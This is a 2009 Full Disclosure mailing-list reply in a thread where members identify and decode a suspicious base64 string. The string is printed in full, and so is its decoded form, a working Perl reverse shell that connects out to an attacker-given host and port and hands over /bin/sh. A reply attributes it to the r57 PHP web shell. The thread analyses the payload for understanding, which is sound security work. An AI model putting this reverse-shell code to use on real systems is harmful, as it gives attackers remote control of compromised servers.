Full Disclosure mailing list archives
Re: connect back PHP hack
From: webDEViL <w3bd3vil () gmail com>
Date: Wed, 11 Feb 2009 00:24:15 +0530
Must be off the r57 php shell. Regards, webDEViL On Wed, Feb 11, 2009 at 12:14 AM, Razi Shaban <razishaban () gmail com> wrote:
On Tue, Feb 10, 2009 at 8:23 PM, sr. <staticrez () gmail com> wrote:can anyone tell me what encoding this is?$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr.Base64, the "==" at the end gives it away. It decrypts to: #!/usr/bin/perl use Socket; $cmd= "lynx"; $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; $0=$cmd; $target=$ARGV[0]; $port=$ARGV[1]; $iaddr=inet_aton($target) || die("Error: $!\n"); $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); $proto=getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system($system); close(STDIN); close(STDOUT); close(STDERR); -- Regards, Razi Shaban _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Razi Shaban (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Razi Shaban (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack Simon Smith (Feb 10)
- Re: connect back PHP hack webDEViL (Feb 10)
- [SPAM] Re: connect back PHP hack Ricky Zhou (Feb 10)
- Re: connect back PHP hack Anastasios Monachos (Feb 10)
- Re: connect back PHP hack Gustavo Castro (Feb 10)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack Justin Rogosky (Feb 11)
- Re: connect back PHP hack sr. (Feb 10)
- Re: connect back PHP hack ilaiy (Feb 10)
- Re: connect back PHP hack Joe Klemencic (Feb 10)
- Re: connect back PHP hack crony (Feb 10)
- Re: connect back PHP hack Joren Gaucher (Feb 10)
- Re: connect back PHP hack Clement Dupuis (Feb 10)